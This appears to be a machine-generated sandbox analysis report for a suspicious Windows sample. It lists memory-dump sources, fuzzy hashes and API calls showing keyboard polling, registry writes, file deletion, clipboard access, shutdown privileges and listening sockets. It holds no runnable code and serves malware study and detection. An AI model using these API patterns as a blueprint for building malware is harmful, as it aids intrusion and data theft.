• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1803514871-438819550
• Opcode ID: 90260ae531a72e61c9cdf65ca1ef2c09ed52f5508324681aabc8efa9e02a37d1
• Instruction ID: bdce4d841f7451ddffa20d6e235c7ecddb437306f9d42b98d46d6026bc1d6c32
• Opcode Fuzzy Hash: 90260ae531a72e61c9cdf65ca1ef2c09ed52f5508324681aabc8efa9e02a37d1
• Instruction Fuzzy Hash: 9231F6369002096FCB1AEBB4EC98AEE77AC9F4C360F504176E804E30A1DB70DE80CA55
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00330953
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0033F910,00000000,?,00000000,?,?), ref: 003309C1
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00330A09
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00330A92
• RegCloseKey.ADVAPI32(?), ref: 00330DB2
• RegCloseKey.ADVAPI32(00000000), ref: 00330DBF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 536824911-966354055
• Opcode ID: b75dc4a49fe13169735d4fd483ffc2a90cec271a48a8ca86fbdfb78d74e97234
• Instruction ID: df6380323342e277dca4b875104384aefb1df1f053d717a36a21271ef1886e3b
• Opcode Fuzzy Hash: b75dc4a49fe13169735d4fd483ffc2a90cec271a48a8ca86fbdfb78d74e97234
• Instruction Fuzzy Hash: 0A0247756146019FCB19EF28C891E6AB7E5EF89310F05855DF98A9B3A2CB30EC51CF81
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID:
• String ID: 0D5$0E5$0F5$3c,$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG5$_,
• API String ID: 0-3963977302
• Opcode ID: 1b39a5b44190389f3191d6a8e8b3b3160d95d18f5febdac97e552aac1a84d809
• Instruction ID: 2f911eddfb4c1761da16637632e313ada473cc8971acc41f1925af75eaa11c10
• Opcode Fuzzy Hash: 1b39a5b44190389f3191d6a8e8b3b3160d95d18f5febdac97e552aac1a84d809
• Instruction Fuzzy Hash: 46728F75E11219DBDB25CF59C894BAEB7F5FF48310F14816AE809EB290E7709E81CB90
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0031F113
• _wcscmp.LIBCMT ref: 0031F128
• _wcscmp.LIBCMT ref: 0031F13F
  • Part of subcall function 00314385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003143A0
• FindNextFileW.KERNEL32(00000000,?), ref: 0031F16E
• FindClose.KERNEL32(00000000), ref: 0031F179
• FindFirstFileW.KERNEL32(*.*,?), ref: 0031F195
• _wcscmp.LIBCMT ref: 0031F1BC
• _wcscmp.LIBCMT ref: 0031F1D3
• SetCurrentDirectoryW.KERNEL32(?), ref: 0031F1E5
• SetCurrentDirectoryW.KERNEL32(00368920), ref: 0031F203
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0031F20D
• FindClose.KERNEL32(00000000), ref: 0031F21A
• FindClose.KERNEL32(00000000), ref: 0031F22C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
• Opcode ID: 6335d7205f0a3790c980df49feebb7712177fd8c79a8f23b4464fb4e1de71539
• Instruction ID: 49fbc08f1141c6f6d42c1726b4ecd1c6b546fac890bb74ca0c12f8a0e85e7888
• Opcode Fuzzy Hash: 6335d7205f0a3790c980df49feebb7712177fd8c79a8f23b4464fb4e1de71539
• Instruction Fuzzy Hash: 2D31E93A900219BECB1AEB64EC95EEE77AC9F4D360F510571E800E31A0DB30DE85CA54
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0031A20F
• __swprintf.LIBCMT ref: 0031A231
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0031A26E
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0031A293
• _memset.LIBCMT ref: 0031A2B2
• _wcsncpy.LIBCMT ref: 0031A2EE
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0031A323
• CloseHandle.KERNEL32(00000000), ref: 0031A32E
• RemoveDirectoryW.KERNEL32(?), ref: 0031A337
• CloseHandle.KERNEL32(00000000), ref: 0031A341
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
• Opcode ID: f6c95290e2c221f6c8866ece0c71f899689fffe8e80d10dabf59db1c004e02ba
• Instruction ID: 3d0681ab22b272f9697cb5ee132e7ac190bcbeff279e8d450ba5e2f642d9cc03
• Opcode Fuzzy Hash: f6c95290e2c221f6c8866ece0c71f899689fffe8e80d10dabf59db1c004e02ba
• Instruction Fuzzy Hash: D431B475900109ABDB22DFA0DC89FFB77BCEF88741F5045B6F908D2160EB7096958B25
APIs
• GetKeyboardState.USER32(?), ref: 00310097
• SetKeyboardState.USER32(?), ref: 00310102
• GetAsyncKeyState.USER32(000000A0), ref: 00310122
• GetKeyState.USER32(000000A0), ref: 00310139
• GetAsyncKeyState.USER32(000000A1), ref: 00310168
• GetKeyState.USER32(000000A1), ref: 00310179
• GetAsyncKeyState.USER32(00000011), ref: 003101A5
• GetKeyState.USER32(00000011), ref: 003101B3
• GetAsyncKeyState.USER32(00000012), ref: 003101DC
• GetKeyState.USER32(00000012), ref: 003101EA
• GetAsyncKeyState.USER32(0000005B), ref: 00310213
• GetKeyState.USER32(0000005B), ref: 00310221
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 1b31702c674f1deb9a696592a23fe376ada2cbbc973f98d6dcf8162e59679e8f
• Instruction ID: ae16c1f14877cfea4d050a511cd7dd9c746ede3b1f92bc310e403a9e1735addc
• Opcode Fuzzy Hash: 1b31702c674f1deb9a696592a23fe376ada2cbbc973f98d6dcf8162e59679e8f
• Instruction Fuzzy Hash: 6051D92490478869FB3EDBB088547EABFB49F09380F09459A95C25A5C2DAE49BCCC761
APIs
  • Part of subcall function 00330E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0032FDAD,?,?), ref: 00330E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003304AC
  • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
  • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0033054B
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003305E3
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00330822
• RegCloseKey.ADVAPI32(00000000), ref: 0033082F
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
• String ID:
• API String ID: 1240663315-0
• Opcode ID: 2754f0c038040d175b83a9e397edd2eaa0388d4c0869054e4a6e5f5a2b3542c6
• Instruction ID: 8923b73f941e9437e80e124e69a5ba0126c3684dba7fa2a3911c2d46dc6b6762
• Opcode Fuzzy Hash: 2754f0c038040d175b83a9e397edd2eaa0388d4c0869054e4a6e5f5a2b3542c6
• Instruction Fuzzy Hash: E1E15E31604200AFCB19DF28C991E6ABBE9EF89314F04896DF94ADB261D730ED11CF91
APIs
  • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
  • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
• CoInitialize.OLE32 ref: 00328403
• CoUninitialize.OLE32 ref: 0032840E
• CoCreateInstance.OLE32(?,00000000,00000017,00342BEC,?), ref: 0032846E
• IIDFromString.OLE32(?,?), ref: 003284E1
• VariantInit.OLEAUT32(?), ref: 0032857B
• VariantClear.OLEAUT32(?), ref: 003285DC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
• Opcode ID: 8c9dfdcc4075d271ee4f31186218cf15d97334b0431eb679a02ea815a7951116
• Instruction ID: 61362f8386c99ee3b9a9f2c4b5e85bb910ad182790fe2fa85964bf5b45ffba77
• Opcode Fuzzy Hash: 8c9dfdcc4075d271ee4f31186218cf15d97334b0431eb679a02ea815a7951116
• Instruction Fuzzy Hash: 7661D4706093229FC712EF15E888FAEB7E8AF49754F14491DF9819B291CB70ED44CB92
APIs
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: 706a1be6f5b8790b9850aa50c4be43de33403042912ef32f63105228ac47584f
• Instruction ID: f64207d80f9f048b62a710a9a3045b98577fe99a70dddadd2ca15bec8be3fdf0
• Opcode Fuzzy Hash: 706a1be6f5b8790b9850aa50c4be43de33403042912ef32f63105228ac47584f
• Instruction Fuzzy Hash: C921A135601210DFDB12AF24EC8AB6E7BACEF15750F11842AF946DB2B1DB70AC50CB54
APIs
  • Part of subcall function 002B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002B4743,?,?,002B37AE,?), ref: 002B4770
  • Part of subcall function 00314A31: GetFileAttributesW.KERNEL32(?,0031370B), ref: 00314A32
• FindFirstFileW.KERNEL32(?,?), ref: 003138A3
• DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0031394B
• MoveFileW.KERNEL32(?,?), ref: 0031395E
• DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0031397B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0031399D
• FindClose.KERNEL32(00000000,?,?,?,?), ref: 003139B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 4002782344-1173974218
• Opcode ID: 29218da78ab374f6224f982de2e404b24136db7784a8434c12317bef63abf5be
• Instruction ID: b0ebf7691db1104320a76f0348dcfecbeb97442911d919b0becfb74c35286ad0
• Opcode Fuzzy Hash: 29218da78ab374f6224f982de2e404b24136db7784a8434c12317bef63abf5be
• Instruction Fuzzy Hash: 53517F3180514DAACF0AFBA0C9929EDB779AF58340F640069E406BB191EF316F49CF60
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0031F440
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0031F470
                                                                                                                    • _wcscmp.LIBCMT ref: 0031F484
                                                                                                                    • _wcscmp.LIBCMT ref: 0031F49F
                                                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 0031F53D
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0031F553
                                                                                                                    Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
• String ID: *.*
• API String ID: 713712311-438819550
Strings
Similarity
• API ID: __itow__swprintf
• String ID: 3c,$_,
• API String ID: 674341424-370742736
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
  • Part of subcall function 002B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002B4743,?,?,002B37AE,?), ref: 002B4770
  • Part of subcall function 00314A31: GetFileAttributesW.KERNEL32(?,0031370B), ref: 00314A32
• FindFirstFileW.KERNEL32(?,?), ref: 00313B89
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00313BD9
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00313BEA
• FindClose.KERNEL32(00000000), ref: 00313C01
• FindClose.KERNEL32(00000000), ref: 00313C0A
Strings
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
APIs
  • Part of subcall function 003087E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0030882B
  • Part of subcall function 003087E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00308858
  • Part of subcall function 003087E1: GetLastError.KERNEL32 ref: 00308865
• ExitWindowsEx.USER32(?,00000000), ref: 003151F9
Strings
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003262DC
• WSAGetLastError.WSOCK32(00000000), ref: 003262EB
• bind.WSOCK32(00000000,?,00000010), ref: 00326307
• listen.WSOCK32(00000000,00000005), ref: 00326316
• WSAGetLastError.WSOCK32(00000000), ref: 00326330
• closesocket.WSOCK32(00000000,00000000), ref: 00326344
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
APIs
  • Part of subcall function 002D0DB6: std::exception::exception.LIBCMT ref: 002D0DEC
  • Part of subcall function 002D0DB6: __CxxThrowException@8.LIBCMT ref: 002D0E01
• _memmove.LIBCMT ref: 00300258
• _memmove.LIBCMT ref: 0030036D
• _memmove.LIBCMT ref: 00300414
Similarity
• API ID: _memmove$Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 1300846289-0
APIs
  • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
• DefDlgProcW.USER32(?,?,?,?,?), ref: 002B19FA
• GetSysColor.USER32(0000000F), ref: 002B1A4E
• SetBkColor.GDI32(?,00000000), ref: 002B1A61
  • Part of subcall function 002B1290: DefDlgProcW.USER32(?,00000020,?), ref: 002B12D8
Similarity
• API ID: ColorProc$LongWindow
• String ID:
• API String ID: 3744519093-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0031BCE6
• _wcscmp.LIBCMT ref: 0031BD16
• _wcscmp.LIBCMT ref: 0031BD2B
• FindNextFileW.KERNEL32(00000000,?), ref: 0031BD3C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0031BD6C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2387731787-0
                                                                                                                    • Opcode ID: 91526e35f54a89b52a3581484109af2a1b694af5eef92361900f3617780df2ea
                                                                                                                    • Instruction ID: 0cf76dd6b31d37be661ba944ed12810fc6b9ddcffc1d475ba04f57bfcf4fee57
                                                                                                                    • Opcode Fuzzy Hash: 91526e35f54a89b52a3581484109af2a1b694af5eef92361900f3617780df2ea
                                                                                                                    • Instruction Fuzzy Hash: AE517A35A046029FC719DF28D491EEAB3E8EF49324F11461DE9568B3A1DB30ED54CB91
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00327DB6
                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0032679E
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003267C7
                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00326800
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0032680D
                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00326821
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 99427753-0
                                                                                                                    • Opcode ID: c7bce5c8025b57d381f20383092b9f3810b924dca1ee28d744bec31dc7dc7baf
                                                                                                                    • Instruction ID: e33d887bf1ca9de9ef50f1ca5acc66b591dd4f7d12a0d8504c764a7028dcaa22
                                                                                                                    • Opcode Fuzzy Hash: c7bce5c8025b57d381f20383092b9f3810b924dca1ee28d744bec31dc7dc7baf
                                                                                                                    • Instruction Fuzzy Hash: 5A41C475A00210AFDB15BF249C87FAE77A8DF05794F44845CFA1AAB3D2CA709D50CB91
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 292994002-0
                                                                                                                    • Opcode ID: f821508c7dafae24aeb7f84f54a5e4aa24bc08e1884e5c192f775e723d8bca2c
                                                                                                                    • Instruction ID: 54f9eba9ac16a9f66ae1b46021c79cce598aeadd5eaf18a14260e52d4b28d5fe
                                                                                                                    • Opcode Fuzzy Hash: f821508c7dafae24aeb7f84f54a5e4aa24bc08e1884e5c192f775e723d8bca2c
                                                                                                                    • Instruction Fuzzy Hash: 7E11BF327009116FEB236F269CC4BAABBADEF457A1F414029F846D7251CBB0DD018AA0
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003080C0
                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003080CA
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003080D9
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003080E0
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003080F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: 68a9e80d0b09539ce9dcf5ed4fd9a0180dd97b04fc161cbf2854c2882f0f2b07
                                                                                                                    • Instruction ID: 0d9a8f20ccebe15e35312283d9ce5af934be7cf5500446d8aec73726064743e5
                                                                                                                    • Opcode Fuzzy Hash: 68a9e80d0b09539ce9dcf5ed4fd9a0180dd97b04fc161cbf2854c2882f0f2b07
                                                                                                                    • Instruction Fuzzy Hash: B6F06235641204AFEB160FA5ECCDE673BACEF49755F400025F985C62A0CBA1DC45DE60
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,002B4AD0), ref: 002B4B45
